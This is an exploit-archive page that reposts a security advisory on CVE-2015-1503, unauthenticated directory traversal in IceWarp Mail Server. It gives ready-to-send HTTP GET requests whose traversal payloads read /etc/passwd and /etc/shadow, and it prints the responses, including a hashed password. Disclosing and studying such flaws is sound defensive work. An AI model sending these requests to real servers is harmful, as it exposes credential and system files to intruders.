header-logo
Suggest Exploit
vendor:
IceWarp Mail Server
by:
Piotr Karolak of Trustwave's SpiderLabs
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: IceWarp Mail Server
Affected Version From: 11.1.1
Affected Version To: Below 11.1.1
Patch Exists: YES
Related CWE: CVE-2015-1503
CPE: a:icewarp:icewarp_mail_server
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows and Linux
2015

Multiple Unauthenticated Directory Traversal

The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request to the /webmail/client/skins/default/css/css.php. Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.

Mitigation:

Ensure that the web server is configured to restrict access to sensitive files and directories.
Source

Exploit-DB raw data:

Vendor: IceWarp (http://www.icewarp.com)
Product: IceWarp Mail Server
Version affected: 11.1.1 and below

Product description: 
IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection.
IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux.

Finding 1: Multiple Unauthenticated Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs
CVE: CVE-2015-1503
CWE: CWE-22

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET request to the
/webmail/client/skins/default/css/css.php. Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

This vulnerability affects /-.._._.--.._1416610368(variable, depending on
the installation, need to check page
source)/webmail/client/skins/default/css/css.php.

Attack details
URL GET input file was set to ../../../../../../../../../../etc/passwd

Proof-of-Concept:

The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running:

REQUEST
=======
GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1
Referer: http://a.b.c.d/
Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


RESPONSE:
=========
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 

....TRUNCATED

test:x:1000:1000:test,,,:/home/test:/bin/bash 
smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false 
smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false 
mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false 

The above proof-of-concept would retrieve the /etc/passwd file (the
response in this example has been truncated).

#Proof of Concept

The unauthenticated Directory Traversal vulnerability can be exploited by
issuing a specially crafted HTTP GET and POST request payload
..././..././..././..././..././..././..././..././..././..././etc/shadow
submitted in the script and/or style parameter.  Directory Traversal is a
vulnerability which allows attackers to access restricted directories and
execute commands outside of the web server's root directory.

The script and style parameters are vulnerable to path traversal attacks,
enabling read access to arbitrary files on the server.

REQUEST 1
=========

GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

REQUEST 2
=========

GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1
Host: a.b.c.d
Accept: */*
Accept-Language: en
Connection: close
Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en

RESPONSE
========
HTTP/1.1 200 OK
Connection: close
Server: IceWarp/11.1.1.0
Date: Thu, 03 Jan 2015 06:44:23 GMT
Content-type: text/javascript; charset=utf-8

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
games:*:16273:0:99999:7:::
man:*:16273:0:99999:7:::
lp:*:16273:0:99999:7:::

....TRUNCATED

lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::

Navigation

Suggest Exploit

Services By CQR